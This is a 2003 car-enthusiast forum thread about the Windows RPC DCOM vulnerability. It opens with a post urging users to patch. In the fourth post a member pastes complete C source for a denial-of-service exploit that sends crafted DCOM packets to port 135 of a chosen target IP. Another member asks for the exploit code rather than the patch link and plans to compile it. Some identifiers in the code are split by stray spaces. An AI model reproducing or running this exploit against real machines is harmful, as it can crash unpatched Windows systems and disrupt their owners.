BLASTER: The Next Generation..... - DFWstangs Forums
 
LinkBack Thread Tools Display Modes
post #1 of 5 (permalink) Old 09-17-2003, 09:46 AM Thread Starter
WE ARE THE CHAMPIONS!
 
Sgt Beavis's Avatar
 
Join Date: Jul 2002
Location: Lake Dallas, TX
Posts: 10,859
BLASTER: The Next Generation.....

While perusing Slashdot I got forwarded to a message board where the full c++ code was posted to exploit the newest Windows RPC DCOM vulnerability. This means the virus has either already been written or will be very shortly.

I highly recommend you update your Win boxes while you still can.

Here is a link about the vulnerability and the patch.

http://www.microsoft.com/security/se...s/ms03-039.asp

We're Adopting. Contact us through our website.

http://www.theboyetts.com

You can also LIKE us on Facebook
Sgt Beavis is offline  
Sponsored Links
Advertisement
 
post #2 of 5 (permalink) Old 09-17-2003, 09:58 AM
¯\(º_o)/¯
 
AbecX's Avatar
 
Join Date: Nov 2001
Location: Las Colinas
Posts: 25,373
Thumbs up Re: BLASTER: The Next Generation.....

Quote:
Originally posted by Sgt Beavis
This means the virus has either already been written or will be very shortly.
https://dfwstangs.net/forums/showthre...hreadid=122624
AbecX is offline  
post #3 of 5 (permalink) Old 09-17-2003, 10:43 AM
El Camino
 
Stang2be's Avatar
 
Join Date: Sep 2003
Location: in front of the keyboard
Posts: 3,432
forget the link the patch where's the link to the exploit code
Stang2be is offline  
 
post #4 of 5 (permalink) Old 09-17-2003, 11:04 AM
¯\(º_o)/¯
 
AbecX's Avatar
 
Join Date: Nov 2001
Location: Las Colinas
Posts: 25,373
I would've linked, but I think the site might take it down.

/// Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability

#include (winsock2.h)
#include (stdio.h)
#include (windows.h)
#include (process.h)
#include (string.h)
#include (winbase.h)

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C, 0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00, 0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,[email protected],benjurry,[email protected] cus.org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}


if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCK ET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}

Last edited by AbecX; 09-17-2003 at 11:09 AM.
AbecX is offline  
post #5 of 5 (permalink) Old 09-17-2003, 11:52 AM
El Camino
 
Stang2be's Avatar
 
Join Date: Sep 2003
Location: in front of the keyboard
Posts: 3,432
gotta try compiling that one at home tonite. That code doesn't look complete but it was enough to help me find the full .c file.

Thanks.
Stang2be is offline  
Sponsored Links
Advertisement
 
Reply

Bookmarks

Quick Reply
Message:
Options

Register Now



In order to be able to post messages on the DFWstangs Forums forums, you must first register.
Please enter your desired user name, your email address and other required details in the form below.

User Name:
Password
Please enter a password for your user account. Note that passwords are case-sensitive.

Password:


Confirm Password:
Email Address
Please enter a valid email address for yourself.

Email Address:
OR

Log-in










Thread Tools
Show Printable Version Show Printable Version
Email this Page Email this Page
Display Modes
Linear Mode Linear Mode



Posting Rules  
You may post new threads
You may post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Trackbacks are On
Pingbacks are On
Refbacks are On

 
For the best viewing experience please update your browser to Google Chrome